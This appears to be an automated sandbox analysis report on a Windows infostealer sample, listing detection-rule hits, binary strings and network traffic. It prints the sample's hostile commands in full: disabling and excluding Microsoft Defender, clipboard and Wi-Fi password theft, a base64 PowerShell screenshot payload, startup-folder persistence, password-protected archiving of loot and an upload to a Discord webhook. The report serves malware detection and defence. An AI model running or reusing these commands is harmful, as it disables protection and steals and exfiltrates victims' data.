              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7512, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", ProcessId: 1868, ProcessName: cmd.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5704, TargetFilename: C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7312, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *, ProcessId: 7360, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5988, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 5440, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7580, ProcessName: cmd.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: 9g9LZNE4bH.exeVirustotal: Detection: 45%Perma Link
              Source: 9g9LZNE4bH.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,70_2_00007FF6AA19901C
              Source: 9g9LZNE4bH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2405833236.00007FF8A8450000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: 9g9LZNE4bH.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000046.00000000.2310221598.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8CCC000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410652961.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409933422.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408813480.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410441345.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdbhPV source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410254689.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409190880.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409408125.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A8731000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdb source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2409000197.00007FF8B7E21000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA592F0 FindFirstFileExW,FindClose,0_2_00007FF78DA592F0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA583B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF78DA583B0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA718E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF78DA718E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA592F0 FindFirstFileExW,FindClose,2_2_00007FF78DA592F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,70_2_00007FF6AA1A46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,70_2_00007FF6AA19E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E88E0 FindFirstFileExA,70_2_00007FF6AA1E88E0
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYXnAAQrWNBsuZgspVDvCX9c HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 758909User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=5bfc7a42494d43b6e137242c97784aaf
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 Jan 2025 08:42:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735980157x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZ14Lq5OBiciWTSQo3QtMCr%2F8X6cwJ9wf3eutoNvbb0uAqGNSo93Y2pDbjSfnVuwbbq1AS6zHs60gYT3NmAAz1hSRLLxOhdM29NfzXgzgGlPkE51o6SRN96372NZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=98f474b5012690ed569d92fa502bc01aa033d261-1735980156; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=MA7Uo7Wyd9dNQPITj.qM1rxHYjgtZpUmTVK4E25GdQk-1735980156106-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fc9efa42c6e176c-EWR
